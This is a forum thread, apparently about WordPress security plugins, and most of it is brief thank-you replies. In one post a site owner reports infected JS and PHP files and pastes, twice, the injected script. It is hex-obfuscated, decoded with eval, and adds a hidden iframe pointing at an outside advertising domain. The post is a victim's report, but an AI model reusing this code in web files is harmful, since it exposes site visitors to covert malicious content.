02-03-2016, 05:08 PM
02-03-2016, 06:20 PM
Thanks very much! Max reps given!
02-03-2016, 06:41 PM
Great advice! Thanks.
02-23-2016, 02:00 AM
All my js file in wp-include, wp-admin and all plugin file got hit by some kind virus
and some php file in wp-include : general-template.php and theme.php
here a sample script that infect your js file (it stick on last line of your js file)
the name of the function can be ramdon ..
/*0a43c2d6e6c084d3305e8a51e765f992*/;(function(){var infrzndn="";var kddberyk="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822613765323538313131616137663336363132313035383036663334373838623922293b69662820783333647120213d2022393266393739663338323738636665633962353164396533306665306264336522297b783232627128226137653235383131316161376633363631323130353830366633343738386239222c223932663937396633383237386366656339623531643965333066653062643365222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e6f67726f6d6e75657369736b692e696e666f2f6d656761616476657274697a652f3f7664494565774b6c757853797a417a72463d444161744e7a43724b69797956434e595950265777486347566b436c53554e654666714d3d5a66686c705765426a4544526873596f4159772662497a775250677468585a70433d516f4d5973627678454d4a434358264d44614e50564c54594a727a75583d545579775874734f6a417962702663574950676f50476e3d72676465774b5a4d646c6f702652654a504a6457654e466b754f7050674e3d45646a507673506f7a6265474e4a4c4575266b6579776f72643d3262366430373839623539386635656237313030633634613130393139383434267959464767574f7667537547793d4174416365507073437268223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var ittztbnh=0;ittztbnh<kddberyk.length;ittztbnh+=2){infrzndn=infrzndn+parseInt(kddberyk.substring(ittztbnh,ittztbnh+2), 16)+",";}infrzndn=infrzndn.substring(0,infrzndn.length-1);eval(eval('String.fromCharCode('+infrzndn+')'));})();/*0a43c2d6e6c084d3305e8a51e765f992*/
and some php file in wp-include : general-template.php and theme.php
here a sample script that infect your js file (it stick on last line of your js file)
the name of the function can be ramdon ..
/*0a43c2d6e6c084d3305e8a51e765f992*/;(function(){var infrzndn="";var kddberyk="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822613765323538313131616137663336363132313035383036663334373838623922293b69662820783333647120213d2022393266393739663338323738636665633962353164396533306665306264336522297b783232627128226137653235383131316161376633363631323130353830366633343738386239222c223932663937396633383237386366656339623531643965333066653062643365222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e6f67726f6d6e75657369736b692e696e666f2f6d656761616476657274697a652f3f7664494565774b6c757853797a417a72463d444161744e7a43724b69797956434e595950265777486347566b436c53554e654666714d3d5a66686c705765426a4544526873596f4159772662497a775250677468585a70433d516f4d5973627678454d4a434358264d44614e50564c54594a727a75583d545579775874734f6a417962702663574950676f50476e3d72676465774b5a4d646c6f702652654a504a6457654e466b754f7050674e3d45646a507673506f7a6265474e4a4c4575266b6579776f72643d3262366430373839623539386635656237313030633634613130393139383434267959464767574f7667537547793d4174416365507073437268223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var ittztbnh=0;ittztbnh<kddberyk.length;ittztbnh+=2){infrzndn=infrzndn+parseInt(kddberyk.substring(ittztbnh,ittztbnh+2), 16)+",";}infrzndn=infrzndn.substring(0,infrzndn.length-1);eval(eval('String.fromCharCode('+infrzndn+')'));})();/*0a43c2d6e6c084d3305e8a51e765f992*/
02-25-2016, 03:01 AM
many thanks
rep+
rep+
03-02-2016, 10:02 AM
Great and informative post.Max reps to you.
03-28-2016, 12:01 PM
Thanks a lot for this valuable share
04-03-2016, 07:12 AM
Thxs...excellent info!!..PURE SOLID GOLD!!
04-03-2016, 12:25 PM
Wow, very interesting and useful information. Thank you!
04-04-2016, 10:06 AM
Thanks a lot for this useful and informative topic!
It's great to know about those security plugins.
It's great to know about those security plugins.